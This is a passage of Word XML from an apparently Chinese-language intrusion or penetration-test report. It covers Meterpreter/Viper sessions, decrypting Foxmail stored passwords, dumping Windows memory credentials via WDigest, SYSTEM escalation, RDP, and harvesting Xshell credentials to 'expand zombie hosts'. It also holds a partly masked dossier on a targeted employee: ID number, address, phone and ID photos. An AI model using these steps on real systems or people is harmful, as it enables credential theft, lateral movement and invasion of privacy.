        <w:t>有两个新会话产生Viper上线信息：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="502"/>
      <w:bookmarkEnd w:id="503"/>
      <w:bookmarkEnd w:id="504"/>
      <w:bookmarkEnd w:id="505"/>
      <w:bookmarkEnd w:id="506"/>
      <w:bookmarkEnd w:id="507"/>
      <w:bookmarkEnd w:id="50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05935" cy="2157095"/>
            <wp:effectExtent l="0" t="0" r="6985" b="698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09" w:name="_Toc20444"/>
      <w:bookmarkStart w:id="510" w:name="_Toc7309"/>
      <w:bookmarkStart w:id="511" w:name="_Toc17608"/>
      <w:bookmarkStart w:id="512" w:name="_Toc24728"/>
      <w:bookmarkStart w:id="513" w:name="_Toc14207"/>
      <w:bookmarkStart w:id="514" w:name="_Toc11983"/>
      <w:bookmarkStart w:id="515" w:name="_Toc6196"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Foxmail邮箱账号密码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="509"/>
      <w:bookmarkEnd w:id="510"/>
      <w:bookmarkEnd w:id="511"/>
      <w:bookmarkEnd w:id="512"/>
      <w:bookmarkEnd w:id="513"/>
      <w:bookmarkEnd w:id="514"/>
      <w:bookmarkEnd w:id="515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16" w:name="_Toc26504"/>
      <w:bookmarkStart w:id="517" w:name="_Toc14671"/>
      <w:bookmarkStart w:id="518" w:name="_Toc32516"/>
      <w:bookmarkStart w:id="519" w:name="_Toc26605"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>搜索：Account.rec0</w:t>
      </w:r>
      <w:bookmarkEnd w:id="516"/>
      <w:bookmarkEnd w:id="517"/>
      <w:bookmarkEnd w:id="518"/>
      <w:bookmarkEnd w:id="519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03955" cy="3225165"/>
            <wp:effectExtent l="0" t="0" r="14605" b="571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20" w:name="_Toc2888"/>
      <w:bookmarkStart w:id="521" w:name="_Toc20300"/>
      <w:bookmarkStart w:id="522" w:name="_Toc3951"/>
      <w:bookmarkStart w:id="523" w:name="_Toc18487"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>解密：Account.rec0</w:t>
      </w:r>
      <w:bookmarkEnd w:id="520"/>
      <w:bookmarkEnd w:id="521"/>
      <w:bookmarkEnd w:id="522"/>
      <w:bookmarkEnd w:id="523"/>
    </w:p>
    <w:p>
      <w:pPr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color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2019/04/22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43175" cy="1990090"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6350"/>
            <wp:docPr id="138" name="图片 138" descr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color w:val="000000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2022/11/21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276475" cy="1515745"/>
            <wp:effectExtent l="0" t="0" r="9525" b="8255"/>
            <wp:docPr id="139" name="图片 139" descr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24" w:name="_Toc28254"/>
      <w:bookmarkStart w:id="525" w:name="_Toc14648"/>
      <w:bookmarkStart w:id="526" w:name="_Toc4439"/>
      <w:bookmarkStart w:id="527" w:name="_Toc13405"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>邮箱成功登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="524"/>
      <w:bookmarkEnd w:id="525"/>
      <w:bookmarkEnd w:id="526"/>
      <w:bookmarkEnd w:id="527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922905" cy="1563370"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6350"/>
            <wp:docPr id="140" name="图片 140" descr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28" w:name="_Toc1912"/>
      <w:bookmarkStart w:id="529" w:name="_Toc4876"/>
      <w:bookmarkStart w:id="530" w:name="_Toc19612"/>
      <w:bookmarkStart w:id="531" w:name="_Toc18694"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果汇总</w:t>
      </w:r>
      <w:bookmarkEnd w:id="528"/>
      <w:bookmarkEnd w:id="529"/>
      <w:bookmarkEnd w:id="530"/>
      <w:bookmarkEnd w:id="531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时间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邮箱账户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邮箱密码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2019/04/22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mxxhxxbxx</w:t>
            </w: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@</w:t>
            </w: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s******p.c**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P****12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2019/07/01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mxxhxxbxx</w:t>
            </w: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@</w:t>
            </w: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s******p.c**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P****12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2020/11/27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mxxhxxbxx</w:t>
            </w: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@</w:t>
            </w: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s******p.c**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P****016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2022/11/21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mxxhxxbxx</w:t>
            </w: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@</w:t>
            </w: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s******p.c**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P****016</w:t>
            </w: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yx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32" w:name="_Toc21236"/>
      <w:bookmarkStart w:id="533" w:name="_Toc10534"/>
      <w:bookmarkStart w:id="534" w:name="_Toc19239"/>
      <w:bookmarkStart w:id="535" w:name="_Toc13026"/>
      <w:bookmarkStart w:id="536" w:name="_Toc12566"/>
      <w:bookmarkStart w:id="537" w:name="_Toc15991"/>
      <w:bookmarkStart w:id="538" w:name="_Toc1128"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>计划任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="532"/>
      <w:bookmarkEnd w:id="533"/>
      <w:bookmarkEnd w:id="534"/>
      <w:bookmarkEnd w:id="535"/>
      <w:bookmarkEnd w:id="536"/>
      <w:bookmarkEnd w:id="537"/>
      <w:bookmarkEnd w:id="538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222625" cy="1612900"/>
            <wp:effectExtent l="0" t="0" r="8255" b="2540"/>
            <wp:docPr id="141" name="图片 141" descr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64990" cy="1259205"/>
            <wp:effectExtent l="0" t="0" r="8890" b="5715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39" w:name="_Toc22040"/>
      <w:bookmarkStart w:id="540" w:name="_Toc29220"/>
      <w:bookmarkStart w:id="541" w:name="_Toc9364"/>
      <w:bookmarkStart w:id="542" w:name="_Toc29941"/>
      <w:bookmarkStart w:id="543" w:name="_Toc18167"/>
      <w:bookmarkStart w:id="544" w:name="_Toc9253"/>
      <w:bookmarkStart w:id="545" w:name="_Toc30347"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>详情：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="539"/>
      <w:bookmarkEnd w:id="540"/>
      <w:bookmarkEnd w:id="541"/>
      <w:bookmarkEnd w:id="542"/>
      <w:bookmarkEnd w:id="543"/>
      <w:bookmarkEnd w:id="544"/>
      <w:bookmarkEnd w:id="545"/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RC4密码: IvMiMUWT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46" w:name="_Toc18998"/>
      <w:bookmarkStart w:id="547" w:name="_Toc29199"/>
      <w:bookmarkStart w:id="548" w:name="_Toc32451"/>
      <w:bookmarkStart w:id="549" w:name="_Toc10482"/>
      <w:bookmarkStart w:id="550" w:name="_Toc23442"/>
      <w:bookmarkStart w:id="551" w:name="_Toc28053"/>
      <w:bookmarkStart w:id="552" w:name="_Toc16945"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>产生新会话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="546"/>
      <w:bookmarkEnd w:id="547"/>
      <w:bookmarkEnd w:id="548"/>
      <w:bookmarkEnd w:id="549"/>
      <w:bookmarkEnd w:id="550"/>
      <w:bookmarkEnd w:id="551"/>
      <w:bookmarkEnd w:id="55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42970" cy="1625600"/>
            <wp:effectExtent l="0" t="0" r="1270" b="508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 w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="553" w:name="_Toc16908"/>
      <w:bookmarkStart w:id="554" w:name="_Toc8450"/>
      <w:bookmarkStart w:id="555" w:name="_Toc1521"/>
      <w:bookmarkStart w:id="556" w:name="_Toc31852"/>
      <w:bookmarkStart w:id="557" w:name="_Toc878"/>
      <w:bookmarkStart w:id="558" w:name="_Toc25972"/>
      <w:bookmarkStart w:id="559" w:name="_Toc23297"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看进程路径位置：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="553"/>
      <w:bookmarkEnd w:id="554"/>
      <w:bookmarkEnd w:id="555"/>
      <w:bookmarkEnd w:id="556"/>
      <w:bookmarkEnd w:id="557"/>
      <w:bookmarkEnd w:id="558"/>
      <w:bookmarkEnd w:id="559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wmic process where caption="check.exe" get caption,commandline /value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88385" cy="1454785"/>
            <wp:effectExtent l="0" t="0" r="8255" b="825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或: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wmic process get name,executablepath,processid|findstr Check.exe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92855" cy="1716405"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5715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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="560" w:name="_Toc13855"/>
      <w:bookmarkStart w:id="561" w:name="_Toc11388"/>
      <w:bookmarkStart w:id="562" w:name="_Toc32201"/>
      <w:bookmarkStart w:id="563" w:name="_Toc14206"/>
      <w:bookmarkStart w:id="564" w:name="_Toc26591"/>
      <w:bookmarkStart w:id="565" w:name="_Toc4392"/>
      <w:bookmarkStart w:id="566" w:name="_Toc11634"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>获取Windows内存Hash</w:t>
      </w:r>
      <w:bookmarkEnd w:id="560"/>
      <w:bookmarkEnd w:id="561"/>
      <w:bookmarkEnd w:id="562"/>
      <w:bookmarkEnd w:id="563"/>
      <w:bookmarkEnd w:id="564"/>
      <w:bookmarkEnd w:id="565"/>
      <w:bookmarkEnd w:id="566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811905" cy="1022350"/>
            <wp:effectExtent l="0" t="0" r="13335" b="13970"/>
            <wp:docPr id="142" name="图片 142" descr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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="567" w:name="_Toc32346"/>
      <w:bookmarkStart w:id="568" w:name="_Toc28720"/>
      <w:bookmarkStart w:id="569" w:name="_Toc23314"/>
      <w:bookmarkStart w:id="570" w:name="_Toc7854"/>
      <w:bookmarkStart w:id="571" w:name="_Toc3362"/>
      <w:bookmarkStart w:id="572" w:name="_Toc4427"/>
      <w:bookmarkStart w:id="573" w:name="_Toc31565"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>获取Windows内存密码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="567"/>
      <w:bookmarkEnd w:id="568"/>
      <w:bookmarkEnd w:id="569"/>
      <w:bookmarkEnd w:id="570"/>
      <w:bookmarkEnd w:id="571"/>
      <w:bookmarkEnd w:id="572"/>
      <w:bookmarkEnd w:id="573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3353435" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="14605" b="0"/>
            <wp:docPr id="143" name="图片 143" descr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74" w:name="_Toc8403"/>
      <w:bookmarkStart w:id="575" w:name="_Toc27662"/>
      <w:bookmarkStart w:id="576" w:name="_Toc30378"/>
      <w:bookmarkStart w:id="577" w:name="_Toc12832"/>
      <w:bookmarkStart w:id="578" w:name="_Toc28393"/>
      <w:bookmarkStart w:id="579" w:name="_Toc1986"/>
      <w:bookmarkStart w:id="580" w:name="_Toc24278"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开启WDigest后：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="574"/>
      <w:bookmarkEnd w:id="575"/>
      <w:bookmarkEnd w:id="576"/>
      <w:bookmarkEnd w:id="577"/>
      <w:bookmarkEnd w:id="578"/>
      <w:bookmarkEnd w:id="579"/>
      <w:bookmarkEnd w:id="580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81" w:name="_Toc32487"/>
      <w:bookmarkStart w:id="582" w:name="_Toc29399"/>
      <w:bookmarkStart w:id="583" w:name="_Toc21649"/>
      <w:bookmarkStart w:id="584" w:name="_Toc14879"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第一次获取</w:t>
      </w:r>
      <w:bookmarkEnd w:id="581"/>
      <w:bookmarkEnd w:id="582"/>
      <w:bookmarkEnd w:id="583"/>
      <w:bookmarkEnd w:id="584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830195" cy="1849120"/>
            <wp:effectExtent l="0" t="0" r="4445" b="10160"/>
            <wp:docPr id="144" name="图片 144" descr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用户名：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mxxhxxbxx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密码：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P****016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kj1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585" w:name="_Toc18086"/>
      <w:bookmarkStart w:id="586" w:name="_Toc4541"/>
      <w:bookmarkStart w:id="587" w:name="_Toc17894"/>
      <w:bookmarkStart w:id="588" w:name="_Toc7732"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第二次获取，2022.11.22</w:t>
      </w:r>
      <w:bookmarkEnd w:id="585"/>
      <w:bookmarkEnd w:id="586"/>
      <w:bookmarkEnd w:id="587"/>
      <w:bookmarkEnd w:id="588"/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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2263140" cy="1311910"/>
            <wp:effectExtent l="0" t="0" r="7620" b="13970"/>
            <wp:docPr id="145" name="图片 145" descr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mxxhxxbxx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P****016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kj2022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89" w:name="_Toc20644"/>
      <w:bookmarkStart w:id="590" w:name="_Toc24987"/>
      <w:bookmarkStart w:id="591" w:name="_Toc6591"/>
      <w:bookmarkStart w:id="592" w:name="_Toc6892"/>
      <w:bookmarkStart w:id="593" w:name="_Toc11952"/>
      <w:bookmarkStart w:id="594" w:name="_Toc29851"/>
      <w:bookmarkStart w:id="595" w:name="_Toc3289"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>远程桌面3389</w:t>
      </w:r>
      <w:bookmarkEnd w:id="589"/>
      <w:bookmarkEnd w:id="590"/>
      <w:bookmarkEnd w:id="591"/>
      <w:bookmarkEnd w:id="592"/>
      <w:bookmarkEnd w:id="593"/>
      <w:bookmarkEnd w:id="594"/>
      <w:bookmarkEnd w:id="595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061970" cy="1212850"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
            <wp:docPr id="146" name="图片 146" descr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596" w:name="_Toc12521"/>
      <w:bookmarkStart w:id="597" w:name="_Toc32414"/>
      <w:bookmarkStart w:id="598" w:name="_Toc12761"/>
      <w:bookmarkStart w:id="599" w:name="_Toc21657"/>
      <w:bookmarkStart w:id="600" w:name="_Toc24538"/>
      <w:bookmarkStart w:id="601" w:name="_Toc31783"/>
      <w:bookmarkStart w:id="602" w:name="_Toc29365"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取Windows System权限：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="596"/>
      <w:bookmarkEnd w:id="597"/>
      <w:bookmarkEnd w:id="598"/>
      <w:bookmarkEnd w:id="599"/>
      <w:bookmarkEnd w:id="600"/>
      <w:bookmarkEnd w:id="601"/>
      <w:bookmarkEnd w:id="602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73400" cy="1729740"/>
            <wp:effectExtent l="0" t="0" r="5080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603" w:name="_Toc19758"/>
      <w:bookmarkStart w:id="604" w:name="_Toc3167"/>
      <w:bookmarkStart w:id="605" w:name="_Toc18017"/>
      <w:bookmarkStart w:id="606" w:name="_Toc10250"/>
      <w:bookmarkStart w:id="607" w:name="_Toc10193"/>
      <w:bookmarkStart w:id="608" w:name="_Toc23810"/>
      <w:bookmarkStart w:id="609" w:name="_Toc2883"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加载Powershell插件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="603"/>
      <w:bookmarkEnd w:id="604"/>
      <w:bookmarkEnd w:id="605"/>
      <w:bookmarkEnd w:id="606"/>
      <w:bookmarkEnd w:id="607"/>
      <w:bookmarkEnd w:id="608"/>
      <w:bookmarkEnd w:id="609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78100" cy="1385570"/>
            <wp:effectExtent l="0" t="0" r="12700" b="127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命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>load powershell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命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>powershell_execute $PSVersionTable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610" w:name="_Toc19269"/>
      <w:bookmarkStart w:id="611" w:name="_Toc12992"/>
      <w:bookmarkStart w:id="612" w:name="_Toc3601"/>
      <w:bookmarkStart w:id="613" w:name="_Toc30547"/>
      <w:bookmarkStart w:id="614" w:name="_Toc27605"/>
      <w:bookmarkStart w:id="615" w:name="_Toc18830"/>
      <w:bookmarkStart w:id="616" w:name="_Toc19953"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进入cmd</w:t>
      </w:r>
      <w:bookmarkEnd w:id="610"/>
      <w:bookmarkEnd w:id="611"/>
      <w:bookmarkEnd w:id="612"/>
      <w:bookmarkEnd w:id="613"/>
      <w:bookmarkEnd w:id="614"/>
      <w:bookmarkEnd w:id="615"/>
      <w:bookmarkEnd w:id="616"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="617" w:name="_Toc31877"/>
      <w:bookmarkStart w:id="618" w:name="_Toc5679"/>
      <w:bookmarkStart w:id="619" w:name="_Toc22204"/>
      <w:bookmarkStart w:id="620" w:name="_Toc17647"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看所有会话：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="617"/>
      <w:bookmarkEnd w:id="618"/>
      <w:bookmarkEnd w:id="619"/>
      <w:bookmarkEnd w:id="62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sessions -i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621" w:name="_Toc20145"/>
      <w:bookmarkStart w:id="622" w:name="_Toc7551"/>
      <w:bookmarkStart w:id="623" w:name="_Toc31413"/>
      <w:bookmarkStart w:id="624" w:name="_Toc26069"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>选择会话id：16</w:t>
      </w:r>
      <w:bookmarkEnd w:id="621"/>
      <w:bookmarkEnd w:id="622"/>
      <w:bookmarkEnd w:id="623"/>
      <w:bookmarkEnd w:id="624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sessions -i 16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466975" cy="1129030"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1397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625" w:name="_Toc30764"/>
      <w:bookmarkStart w:id="626" w:name="_Toc2345"/>
      <w:bookmarkStart w:id="627" w:name="_Toc14126"/>
      <w:bookmarkStart w:id="628" w:name="_Toc23654"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进入cmd</w:t>
      </w:r>
      <w:bookmarkEnd w:id="625"/>
      <w:bookmarkEnd w:id="626"/>
      <w:bookmarkEnd w:id="627"/>
      <w:bookmarkEnd w:id="62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s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hell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50160" cy="1320165"/>
            <wp:effectExtent l="0" t="0" r="10160" b="5715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629" w:name="_Toc9240"/>
      <w:bookmarkStart w:id="630" w:name="_Toc12342"/>
      <w:bookmarkStart w:id="631" w:name="_Toc6508"/>
      <w:bookmarkStart w:id="632" w:name="_Toc22946"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>测试:ipconfig</w:t>
      </w:r>
      <w:bookmarkEnd w:id="629"/>
      <w:bookmarkEnd w:id="630"/>
      <w:bookmarkEnd w:id="631"/>
      <w:bookmarkEnd w:id="63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97480" cy="1417320"/>
            <wp:effectExtent l="0" t="0" r="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退出：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从cmd命令行返回到meterperter&gt;命令行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exit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从meterpreter&gt;命令行返回到msf6&gt;命令行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background/exit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633" w:name="_Toc28764"/>
      <w:bookmarkStart w:id="634" w:name="_Toc28024"/>
      <w:bookmarkStart w:id="635" w:name="_Toc813"/>
      <w:bookmarkStart w:id="636" w:name="_Toc8676"/>
      <w:bookmarkStart w:id="637" w:name="_Toc10400"/>
      <w:bookmarkStart w:id="638" w:name="_Toc21318"/>
      <w:bookmarkStart w:id="639" w:name="_Toc25925"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>个人画像（翻资料</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获得doc/xls/pdf/ppt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="633"/>
      <w:bookmarkEnd w:id="634"/>
      <w:bookmarkEnd w:id="635"/>
      <w:bookmarkEnd w:id="636"/>
      <w:bookmarkEnd w:id="637"/>
      <w:bookmarkEnd w:id="638"/>
      <w:bookmarkEnd w:id="639"/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姓名：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***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职位：开发工程师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部门：生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*****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部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入职时间：201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-11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工作年限：201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</w:t>
      </w:r>
      <w:bookmarkStart w:id="1035" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1035"/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至今（2022）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毕业院校：南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******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院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</w:rPr>
        <w:t>出生年月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>19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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>年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0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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>月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1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日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地址：四川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*******************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3号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</w:rPr>
        <w:t>性别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：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男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身份证号：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51******51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身份证有效期：2017.08.31-2037.08.31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签发机关：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**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市公安局安居分局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学历：专科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毕业年份：2005年7月1日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毕业证证书编号：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11************19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专业：工业电气自动化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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学制：3年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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>手机号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>159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********</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>842</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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住址：深圳市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*******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村3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*****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本人照片：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49910" cy="731520"/>
            <wp:effectExtent l="0" t="0" r="13970" b="0"/>
            <wp:docPr id="147" name="图片 147" descr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83235" cy="737870"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8890"/>
            <wp:docPr id="148" name="图片 148" descr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身份证照片：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084580" cy="1549400"/>
            <wp:effectExtent l="0" t="0" r="12700" b="5080"/>
            <wp:docPr id="149" name="图片 149" descr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毕业证：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814830" cy="1212215"/>
            <wp:effectExtent l="0" t="0" r="13970" b="6985"/>
            <wp:docPr id="150" name="图片 150" descr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640" w:name="_Toc21660"/>
      <w:bookmarkStart w:id="641" w:name="_Toc19211"/>
      <w:bookmarkStart w:id="642" w:name="_Toc18849"/>
      <w:bookmarkStart w:id="643" w:name="_Toc14895"/>
      <w:bookmarkStart w:id="644" w:name="_Toc9717"/>
      <w:bookmarkStart w:id="645" w:name="_Toc30887"/>
      <w:bookmarkStart w:id="646" w:name="_Toc11106"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>扩展肉鸡</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取xshell凭证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="640"/>
      <w:bookmarkEnd w:id="641"/>
      <w:bookmarkEnd w:id="642"/>
      <w:bookmarkEnd w:id="643"/>
      <w:bookmarkEnd w:id="644"/>
      <w:bookmarkEnd w:id="645"/>
      <w:bookmarkEnd w:id="64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76955" cy="3274695"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1905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结果：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用户名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10.*.*.9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47" w:name="_Toc15527"/>
      <w:bookmarkStart w:id="648" w:name="_Toc8508"/>
      <w:bookmarkStart w:id="649" w:name="_Toc8573"/>
      <w:bookmarkStart w:id="650" w:name="_Toc4820"/>
